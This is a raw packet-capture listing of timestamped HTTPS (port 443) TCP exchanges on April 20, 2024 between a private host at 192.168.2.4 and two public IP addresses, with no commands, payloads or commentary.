Apr 20, 2024 13:22:01.971237898 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:01.979959965 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.980032921 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:01.996386051 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:01.996531963 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.011892080 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.011974096 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.019896984 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.019961119 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.035446882 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.035588026 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.043009043 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.043070078 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.058207035 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.058321953 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.071049929 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.071214914 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.076011896 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.076090097 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.085530996 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.085597038 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.092673063 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.092830896 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.102468014 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.102540970 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.107327938 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.107399940 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.116947889 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.117026091 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.121854067 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.121936083 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.131391048 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.131539106 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.141006947 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.141061068 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.145951033 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.146030903 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.153096914 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.153227091 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.162724018 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.162798882 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.172106981 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.172198057 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.176423073 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.176492929 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.185168982 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.185240984 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.189424038 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.189505100 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.197652102 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.197855949 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.204302073 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.204361916 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.208302975 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.208386898 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.211164951 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.211229086 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.216384888 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.216454029 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.221837044 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.221940994 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.224426985 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.224498034 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.229425907 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.229513884 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.232121944 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.232194901 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.236696005 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.236763000 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.240132093 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.240200043 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.245285034 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.245352030 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.247364998 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.247430086 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.251827002 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.251885891 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.256412983 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.256479025 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.258517981 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.258584976 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.262887955 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.262950897 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.265938997 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.265999079 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.269987106 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.270113945 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.272296906 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.272361040 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.276135921 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.276197910 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.278227091 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.278292894 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.282206059 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.282288074 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.286389112 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.286483049 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.288332939 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.288392067 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.292221069 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.292277098 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.294122934 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.294176102 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.297975063 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.298029900 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.301727057 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.301832914 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.304533958 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.304589987 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.306396008 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.306576967 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.310015917 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.310081959 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.313954115 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.314004898 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.315737963 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.315848112 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.319005013 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.319065094 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.320718050 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.320768118 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.324444056 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.324508905 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.327614069 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.327670097 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.329301119 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.329359055 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.332633972 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.332804918 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.334265947 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.334326982 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.338345051 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.338395119 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.339937925 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.340003014 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.343169928 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.343235016 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.344649076 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.344717026 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.347670078 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.347718000 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.350605011 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.350708008 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.352216005 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.352267981 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.355005980 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.355097055 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.356468916 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.356564045 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.359329939 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.359395981 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.362524033 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.362580061 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.363821030 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.363887072 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.366276026 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.366369009 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.368890047 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.368944883 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.370244026 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.370327950 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.372888088 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.372948885 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.374767065 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.374821901 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.377278090 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.377394915 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.378644943 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.378719091 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.381042957 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.381102085 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.382312059 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.382380009 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.384711027 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.384793043 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.387104034 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.387166977 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.388288975 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.388345957 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.390645981 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.390703917 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.391832113 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.391885996 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.394113064 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.394207954 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.396276951 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.396337032 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.397454977 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.397516966 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.399575949 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.399636984 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.400772095 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.400847912 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.402838945 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.403007030 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.404472113 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.404609919 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.406541109 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.406596899 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.407588005 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.407655954 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.409703970 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.409764051 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.411684036 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.411741972 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.412657976 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.413075924 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.414642096 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.414729118 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.415663958 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.415735006 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.417579889 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.417634010 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.419464111 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.419537067 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.420536995 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.420643091 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.422348022 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.422399998 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.424245119 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.424295902 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.424348116 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.425223112 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.425401926 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.427282095 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.427350998 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.428190947 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.428246021 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.429235935 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.429342031 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.431091070 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.431140900 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.432852030 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.432903051 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.433721066 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.433809042 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.435442924 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.435496092 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.437211037 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.437264919 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.438119888 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.438198090 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.439790964 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.439842939 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.440661907 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.440705061 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.442320108 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.442370892 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.443963051 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.444032907 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.444828987 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.444881916 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.446415901 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.446491003 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.447249889 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.447304010 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.448838949 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.448898077 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.450397968 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.450452089 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.451601028 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.451651096 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.452429056 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.452502966 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.453913927 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.453974962 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.455470085 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.455542088 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.456250906 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.456309080 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.457937956 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.458072901 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.458626986 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.458688021 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.460032940 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.460122108 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.461605072 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.461664915 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.462435007 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.462497950 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.464088917 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.464152098 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.465202093 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.465270996 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.465923071 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.466031075 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.467396021 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.467519999 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.468060017 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.468120098 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.469460964 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.469523907 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.470566034 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.470630884 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.471995115 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.472146988 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.472714901 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.472839117 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.474081039 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.474136114 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.475522995 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.475583076 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.476186991 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.476264000 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.477572918 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.477673054 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.478300095 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.478355885 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.479597092 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.479661942 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.481048107 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.481147051 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.481754065 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.481811047 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.483055115 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.483160019 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.483719110 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.483788967 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.484339952 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.484407902 CEST	443	49732	169.197.85.95	192.168.2.4
Apr 20, 2024 13:22:02.485624075 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:22:02.489559889 CEST	49732	443	192.168.2.4	169.197.85.95
Apr 20, 2024 13:23:15.055221081 CEST	49742	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:15.055313110 CEST	443	49742	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:15.055459976 CEST	49742	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:15.057107925 CEST	49742	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:15.057143927 CEST	443	49742	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:15.292540073 CEST	443	49742	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:15.292604923 CEST	49742	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:15.294934988 CEST	49742	443	192.168.2.4	172.67.129.243
Apr 20, 2024 13:23:15.294955969 CEST	443	49742	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:15.295460939 CEST	443	49742	172.67.129.243	192.168.2.4
Apr 20, 2024 13:23:15.347484112 CEST	49742	443	192.168.2.4	172.67.129.243
